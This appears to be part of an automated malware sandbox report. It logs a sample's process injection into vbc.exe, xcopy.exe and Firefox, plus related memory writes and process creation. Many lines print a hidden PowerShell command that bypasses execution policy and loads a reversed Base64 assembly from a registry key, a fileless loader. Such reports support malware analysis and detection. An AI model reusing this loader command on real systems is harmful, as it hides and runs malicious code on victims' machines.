Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 9B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 570000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 770000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 1B0000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4D90000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5350000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5300000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 600000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: NULL target: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Section loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\xcopy.exe

Thread register set: target process: 7684

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 9B0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 9B1000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 66D008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 570000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 571000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 752008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 770000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 771000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 91C008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 9B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 9B1000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 7CD008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 1B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 1B1000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 3E5008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 950000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 951000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 6FC008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4D90000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4D91000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4F6B008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 800000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 801000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 6E6008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5350000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5351000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 50EF008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5300000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5301000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5041008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 601000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5AD008

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -noexit -command [appdomain]::currentdomain.load([convert]::frombase64string((-join (get-itemproperty -literalpath 'hkcu:\software\lkezaynmpvlnixj' -name 's').s \| foreach-object {$_[-1..-($_.length)]}))); [b.b]::b('lkezaynmpvlnixj')	Jump to behavior

Source: RNDzmzHPyfZMe3si.exe, 00000011.00000000.1469512288.0000000001030000.00000002.00000001.00040000.00000000.sdmp, RNDzmzHPyfZMe3si.exe, 00000011.00000002.3725400614.0000000001030000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: RNDzmzHPyfZMe3si.exe, 00000011.00000000.1469512288.0000000001030000.00000002.00000001.00040000.00000000.sdmp, RNDzmzHPyfZMe3si.exe, 00000011.00000002.3725400614.0000000001030000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RNDzmzHPyfZMe3si.exe, 00000011.00000000.1469512288.0000000001030000.00000002.00000001.00040000.00000000.sdmp, RNDzmzHPyfZMe3si.exe, 00000011.00000002.3725400614.0000000001030000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: RNDzmzHPyfZMe3si.exe, 00000011.00000000.1469512288.0000000001030000.00000002.00000001.00040000.00000000.sdmp, RNDzmzHPyfZMe3si.exe, 00000011.00000002.3725400614.0000000001030000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
